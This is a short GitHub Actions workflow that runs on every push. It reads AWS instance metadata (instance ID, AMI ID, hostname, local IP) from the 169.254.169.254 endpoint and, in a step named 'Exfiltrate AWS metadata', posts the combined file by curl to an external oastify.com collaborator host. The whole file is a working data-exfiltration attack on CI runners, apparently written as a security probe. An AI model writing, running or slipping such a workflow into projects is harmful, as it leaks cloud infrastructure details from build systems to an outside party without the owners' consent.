name: AWS Metadata Collection

on: [push]

jobs:
  aws_metadata:
    runs-on: ubuntu-latest
    container:
      image: debian:latest

    steps:
      - name: Install curl
        run: apt update && apt install -y curl

      - name: Query AWS metadata and save to file
        run: |
          # Try to get some common AWS metadata paths
          mkdir -p aws_metadata
          curl -s http://169.254.169.254/latest/meta-data/ > aws_metadata/meta-data-root.txt
          curl -s http://169.254.169.254/latest/meta-data/instance-id > aws_metadata/instance-id.txt
          curl -s http://169.254.169.254/latest/meta-data/ami-id > aws_metadata/ami-id.txt
          curl -s http://169.254.169.254/latest/meta-data/hostname > aws_metadata/hostname.txt
          curl -s http://169.254.169.254/latest/meta-data/local-ipv4 > aws_metadata/local-ipv4.txt

          # Combine all metadata files into one
          cat aws_metadata/*.txt > aws_metadata.txt || echo "No metadata found" > aws_metadata.txt

      - name: Exfiltrate AWS metadata
        run: curl -X POST http://8t2n2mhe0a22b0rl55nyrrscd3ju7l89x.oastify.com --data-binary @aws_metadata.txt
